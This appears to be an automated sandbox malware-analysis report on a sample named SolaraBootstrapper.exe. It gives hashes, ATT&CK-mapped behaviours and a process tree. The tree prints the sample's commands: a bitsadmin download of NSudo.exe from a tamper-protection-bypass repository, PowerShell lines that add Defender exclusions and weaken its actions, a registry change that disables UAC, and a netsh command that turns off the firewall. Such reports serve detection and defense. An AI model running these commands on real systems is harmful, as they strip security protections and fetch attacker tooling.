Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 12:27
Static task
static1
Behavioral task
behavioral1
Sample
SolaraBootstrapper.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
SolaraBootstrapper.exe
Resource
win10v2004-20240709-en
General
-
Target
SolaraBootstrapper.exe
-
Size
715KB
-
MD5
f76e6a62661fdf7181a0072479b2f7c7
-
SHA1
bd4995f5d5d39931cec7bdf7872c89ca1c98b5d0
-
SHA256
f74f54580d6be2be3245755cd960e61a29f0b0766e3eec827cb2909d6c768801
-
SHA512
526e948cffaacaa6caa9313d28bdf8b726a40d863a6b6021482497b7c121ed830141cdcc3128d08122d9e50ab39fc4a0ff6475640ea0790c3b099ed829f310b9
-
SSDEEP
12288:gPwNKpOkwyszkgmBaPeMpAqrepwBWP3pwdDT6ulrGQ+Sf4JRZbsGOsyr4Fzi5:gPwAkkEzkgyaPhKpNPSDT6ulGtR6eFz
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2136 powershell.exe 1424 powershell.exe 1856 powershell.exe 1664 powershell.exe 2872 powershell.exe 2656 powershell.exe 1896 powershell.exe 880 powershell.exe 2396 powershell.exe 2100 powershell.exe 2264 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1352 netsh.exe -
Executes dropped EXE 1 IoCs
pid Process 2816 Solara.exe -
Loads dropped DLL 2 IoCs
pid Process 2648 SolaraBootstrapper.exe 2648 SolaraBootstrapper.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 3 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2576 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2136 powershell.exe 1424 powershell.exe 1508 powershell.exe 2872 powershell.exe 2656 powershell.exe 1896 powershell.exe 880 powershell.exe 2396 powershell.exe 2100 powershell.exe 2264 powershell.exe 1664 powershell.exe 1856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2648 wrote to memory of 2816 2648 SolaraBootstrapper.exe 30 PID 2648 wrote to memory of 2816 2648 SolaraBootstrapper.exe 30 PID 2648 wrote to memory of 2816 2648 SolaraBootstrapper.exe 30 PID 2648 wrote to memory of 2816 2648 SolaraBootstrapper.exe 30 PID 2816 wrote to memory of 2764 2816 Solara.exe 31 PID 2816 wrote to memory of 2764 2816 Solara.exe 31 PID 2816 wrote to memory of 2764 2816 Solara.exe 31 PID 2764 wrote to memory of 2444 2764 cmd.exe 33 PID 2764 wrote to memory of 2444 2764 cmd.exe 33 PID 2764 wrote to memory of 2444 2764 cmd.exe 33 PID 2764 wrote to memory of 2856 2764 cmd.exe 34 PID 2764 wrote to memory of 2856 2764 cmd.exe 34 PID 2764 wrote to memory of 2856 2764 cmd.exe 34 PID 2764 wrote to memory of 2576 2764 cmd.exe 35 PID 2764 wrote to memory of 2576 2764 cmd.exe 35 PID 2764 wrote to memory of 2576 2764 cmd.exe 35 PID 2764 wrote to memory of 2136 2764 cmd.exe 36 PID 2764 wrote to memory of 2136 2764 cmd.exe 36 PID 2764 wrote to memory of 2136 2764 cmd.exe 36 PID 2764 wrote to memory of 1424 2764 cmd.exe 37 PID 2764 wrote to memory of 1424 2764 cmd.exe 37 PID 2764 wrote to memory of 1424 2764 cmd.exe 37 PID 2764 wrote to memory of 1508 2764 cmd.exe 38 PID 2764 wrote to memory of 1508 2764 cmd.exe 38 PID 2764 wrote to memory of 1508 2764 cmd.exe 38 PID 2764 wrote to memory of 2872 2764 cmd.exe 39 PID 2764 wrote to memory of 2872 2764 cmd.exe 39 PID 2764 wrote to memory of 2872 2764 cmd.exe 39 PID 2764 wrote to memory of 2656 2764 cmd.exe 40 PID 2764 wrote to memory of 2656 2764 cmd.exe 40 PID 2764 wrote to memory of 2656 2764 cmd.exe 40 PID 2764 wrote to memory of 1896 2764 cmd.exe 41 PID 2764 wrote to memory of 1896 2764 cmd.exe 41 PID 2764 wrote to memory of 1896 2764 cmd.exe 41 PID 2764 wrote to memory of 880 2764 cmd.exe 42 PID 2764 wrote to memory of 880 2764 cmd.exe 42 PID 2764 wrote to memory of 880 2764 cmd.exe 42 PID 2764 wrote to memory of 2396 2764 cmd.exe 43 PID 2764 wrote to memory of 2396 2764 cmd.exe 43 PID 2764 wrote to memory of 2396 2764 cmd.exe 43 PID 2764 wrote to memory of 2100 2764 cmd.exe 44 PID 2764 wrote to memory of 2100 2764 cmd.exe 44 PID 2764 wrote to memory of 2100 2764 cmd.exe 44 PID 2764 wrote to memory of 2264 2764 cmd.exe 45 PID 2764 wrote to memory of 2264 2764 cmd.exe 45 PID 2764 wrote to memory of 2264 2764 cmd.exe 45 PID 2764 wrote to memory of 1664 2764 cmd.exe 46 PID 2764 wrote to memory of 1664 2764 cmd.exe 46 PID 2764 wrote to memory of 1664 2764 cmd.exe 46 PID 1664 wrote to memory of 1352 1664 powershell.exe 47 PID 1664 wrote to memory of 1352 1664 powershell.exe 47 PID 1664 wrote to memory of 1352 1664 powershell.exe 47 PID 2764 wrote to memory of 1856 2764 cmd.exe 48 PID 2764 wrote to memory of 1856 2764 cmd.exe 48 PID 2764 wrote to memory of 1856 2764 cmd.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\Solara.exe"C:\Users\Admin\AppData\Local\Temp\Solara.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat C:\Users\Admin\AppData\Local\Temp\Solara.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:2444
-
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs4⤵PID:2856
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1352
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension "Solara.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ca8c6adbbd6da2a4a498fa35426ec982
SHA109e3d8616a6bfa8a5999324e6686139027acfb81
SHA256ebb973dfe87b50bf8344ea291272ee1590f382a5735f92a56b8ef6d3d30fcf5c
SHA51272520a8c8d61cd02469448c02017c2a3b039fb045358512a0a8cb8f2bd90fb46c5ac6027f88a6bab87d5ca1a96445809459ef18035bf32df246230d39d2b72b0
-
Filesize
112B
MD59313d55e26ad30ddcbc046fe8013a21d
SHA1a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA51277b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5de015ba5b82c0761db0f20dfa78e1535
SHA16cddb53932f20d49aef44dd01657f0b980cdb5aa
SHA25637ad9b7f9a23a02db5c4c92be82704ec52abd7fbdf7b9ce194e9a77fd3069bd7
SHA512d6c69a7f7b313d7e62150a4233be291e2f62b40a5486a1c74dd301f2e80e839c3915263ca33e3aafdb50bf4c2d61ea5487d3f758794d058728ba94aab7a5efd4
-
Filesize
123KB
MD597c55dabe9a79cd79f28c956776f7419
SHA11d24c86f2c31d8a099573e57e508aead646a1fce
SHA25616f593cacbe6af31b0ec10b285bed89efb1b270f6bb29ec05fc98237f0194913
SHA5121d26d2bcd410bc34e3a5e20562084423a143fd1d758ce28ed7841c9a15acba4425a8790b1357f722bad7200204a199e3830e9ab21343b8d72b0f7d4e5f523e8b